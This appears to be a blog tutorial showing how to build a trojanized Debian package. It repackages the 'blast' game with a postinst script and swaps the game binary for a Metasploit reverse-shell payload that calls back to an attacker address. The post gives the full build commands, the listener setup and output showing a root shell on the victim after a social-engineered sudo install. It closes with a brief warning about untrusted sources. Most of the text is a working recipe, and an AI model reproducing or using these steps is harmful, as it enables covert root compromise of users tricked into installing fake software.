Again, this is an attack that exploits users more than it does any specific system vulnerability, and unfortunately many Linux users.. particularly Ubuntu users (because a large percentage of them are new to computers / Linux / security).. will tend to be very trusting of others that offer them software or provide links to resources, and an unscrupulous attacker can take advantage of that.
All an attacker needs is a .deb, we'll use blast.. its a weird little game where you can turn your display into swiss cheese.
root@zombi:/#apt-get install blast
Then make a directory to work in and move the blast package there:
root@zombi:/#mkdir /x
root@zombi:/x# cp /var/cache/apt/archives/blast_1.1-19_amd64.deb .
root@zombi:/x# dpkg -x blast_1.1-19_amd64.deb pkg
root@zombi:/x# mkdir pkg/DEBIAN
Next, make a control file that details your new package, this can be as fake or realistic as you like but you must make sure the architecture is set to what your victim will be using (x86 vs amd64), and a post-install script that will run the Trojan binary:
root@zombi:/x# cd pkg/DEBIAN/
root@zombi:/x/pkg/DEBIAN# vim control
Package: Blast
Version: 0.666
Section: Games And Amusement
Priority: Optional
Architecture: i386
Maintainer: Deceased
Description: Tojan Test
root@zombi:/x/pkg/DEBIAN# vim postinst
#!/bin/sh
sudo chmod 2755 /usr/games/blast && /usr/games/blast & /usr/games/blast &root@zombi:/x/pkg/DEBIAN# chmod 755 postinst
Next, set up the payload, this is done just like the windows Trojan only using a Linux shell and a normal binary rather than a .exe, after-which we build the new Trojan .deb package:
root@zombi:/x/pkg/DEBIAN# msfpayload linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 X > /x/pkg/usr/games/blast
root@zombi:/x/pkg/DEBIAN# dpkg-deb --build /x/pkg
root@zombi:/x# mv pkg.deb blast_0.666.deb
And back to our trusty listener on the attackers machine, again, just like before when exploiting windows:
root@zombi:~# msfcli exploit/multi/handler PAYLOAD=linux/x86/shell/reverse_tcp LHOST=192.168.168.13 LPORT=9999 E
[*] Please wait while we load the module tree...
[*] Started reverse handler on 192.168.168.13:9999
[*] Starting the payload handler...
Now, the attacker is all set with their Trojan .deb package and only needs to trick a user into running it, the beauty in this particular vector is that in Debian based Linux systems a user must install packages as root or using sudo (ironically a security feature), which means that our Trojan will be executed as root.
---Through social engineering or some other method, the user is convinced to run our infected .deb ---
neurophobic@bt:~$ sudo dpkg -i blast_0.666.deb
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...
Processing triggers for menu ...
Processing triggers for man-db ...
tar: ./control: time stamp 2010-03-02 11:19:22 is 34.574471421 s in the future
tar: .: time stamp 2010-03-02 11:19:22 is 34.573961287 s in the future
Selecting previously deselected package blast.
(Reading database ... 269350 files and directories currently installed.)
Unpacking blast (from blast_0.666.deb) ...
Setting up blast (0.666) ...
Processing triggers for menu ...
Processing triggers for man-db ...
And the attacker is greeted with a nice little message:
[*] Sending stage (36 bytes)
[*] Sending stage (36 bytes)
[*] Command shell session 2 opened (192.168.168.13:9999 -> 192.168.168.144:52402)
hostname
bt
whoami
root
Todays lesson: stick to software in a trusted repository unless you really trust your source.
0 comments:
Post a Comment